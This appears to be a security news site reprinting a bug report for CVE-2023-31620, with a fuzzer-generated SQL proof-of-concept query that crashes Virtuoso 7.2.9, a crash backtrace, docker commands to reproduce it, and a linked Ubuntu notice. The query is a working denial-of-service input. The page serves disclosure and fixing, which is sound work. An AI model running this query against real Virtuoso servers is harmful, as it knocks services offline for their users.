Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31620: virtuoso 7.2.9 crashed at dv_compare · Issue #1128 · openlink/virtuoso-opensource

An issue in the dv_compare component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

CVE
#sql#dos#docker

The PoC is generated by my DBMS fuzzer.

CREATE TABLE element ( name VARCHAR(80), test1 VARCHAR(80), f1 VARCHAR(80), f2 VARCHAR(80), code INTEGER, t1 VARCHAR(80), a VARCHAR(80), example VARCHAR(80), b VARCHAR(80), c VARCHAR(80), folders VARCHAR(80) ); INSERT INTO element(b,b) VALUES(38,1444); SELECT (select ( -count(distinct case case code when b then c*case when b<=element.b+b then code when (abs(element.c)/abs(case when b-coalesce((select max(element.c-element.b) from element where not exists(select 1 from element where 17 in (b,13,(b)) or b in (b,c,element.b))),element.b) not in (b,(©),element.b) then -19 when c between code and 13 then 19 else element.c end))=13 then c else 13 end else 17 end when 13 then element.c else element.b end-element.c)) from element) FROM element WHERE coalesce((select max(element.b) from element where element.c<>element.c-13),element.code)>=b or b*coalesce((select max((b)) from element where c not between +coalesce((select max(13) from element where b between -(abs(( -coalesce((select max(case c when element.c then b else -element.c end) from element where 11>b and element.b<element.b),element.c)))/abs(b)) and b),code) and element.b),element.b)* -19 not between (17) and element.c and (element.b<=code);

backtrace:

#0 0x60afab (dv_compare+0x3b) #1 0xc278fb (cmp_vec_any+0x24b) #2 0xc28caa (cmp_vec+0x12ba) #3 0x751b48 (code_vec_run_v+0x1368) #4 0x7ac72d (qn_send_output+0xbd) #5 0x7ac43e (qn_input+0x3ce) #6 0x7ac8a6 (qn_send_output+0x236) #7 0x81e26d (set_ctr_vec_input+0x94d) #8 0x7ac43e (qn_input+0x3ce) #9 0x74f268 (subq_next+0x258) #10 0x81cfa2 (ins_vec_subq+0x2a2) #11 0x75119b (code_vec_run_v+0x9bb) #12 0x7b5a9b (end_node_input+0x13b) #13 0x7ac43e (qn_input+0x3ce) #14 0x7acb6f (qn_ts_send_output+0x23f) #15 0x7b247e (table_source_input+0x16ee) #16 0x7ac43e (qn_input+0x3ce) #17 0x7b9c3b (fun_ref_node_input+0x36b) #18 0x7ac43e (qn_input+0x3ce) #19 0x7ac8a6 (qn_send_output+0x236) #20 0x81e26d (set_ctr_vec_input+0x94d) #21 0x7ac43e (qn_input+0x3ce) #22 0x74f268 (subq_next+0x258) #23 0x81cfa2 (ins_vec_subq+0x2a2) #24 0x75119b (code_vec_run_v+0x9bb) #25 0x7b5a9b (end_node_input+0x13b) #26 0x7ac43e (qn_input+0x3ce) #27 0x7acb6f (qn_ts_send_output+0x23f) #28 0x7b247e (table_source_input+0x16ee) #29 0x7ac43e (qn_input+0x3ce) #30 0x7b9c3b (fun_ref_node_input+0x36b) #31 0x7ac43e (qn_input+0x3ce) #32 0x7ac8a6 (qn_send_output+0x236) #33 0x81e26d (set_ctr_vec_input+0x94d) #34 0x7ac43e (qn_input+0x3ce) #35 0x74f268 (subq_next+0x258) #36 0x81cfa2 (ins_vec_subq+0x2a2) #37 0x75119b (code_vec_run_v+0x9bb) #38 0x7b5a9b (end_node_input+0x13b) #39 0x7ac43e (qn_input+0x3ce) #40 0x7acb6f (qn_ts_send_output+0x23f) #41 0x7b247e (table_source_input+0x16ee) #42 0x7ac43e (qn_input+0x3ce) #43 0x7ac8a6 (qn_send_output+0x236) #44 0x81e26d (set_ctr_vec_input+0x94d) #45 0x7ac43e (qn_input+0x3ce) #46 0x7bdc6e (qr_exec+0x11ee) #47 0x7cb446 (sf_sql_execute+0x11a6) #48 0x7cbf4e (sf_sql_execute_w+0x17e) #49 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #50 0xe1f01c (future_wrapper+0x3fc) #51 0xe2691e (_thread_boot+0x11e) #52 0x7f731e31d609 (start_thread+0xd9) #53 0x7f731e0ed133 (clone+0x43)

ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9

wait the server starting

sleep 10

check whether the simple query works

echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba

run the poc

docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”

Related news

Ubuntu Security Notice USN-6879-1

Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907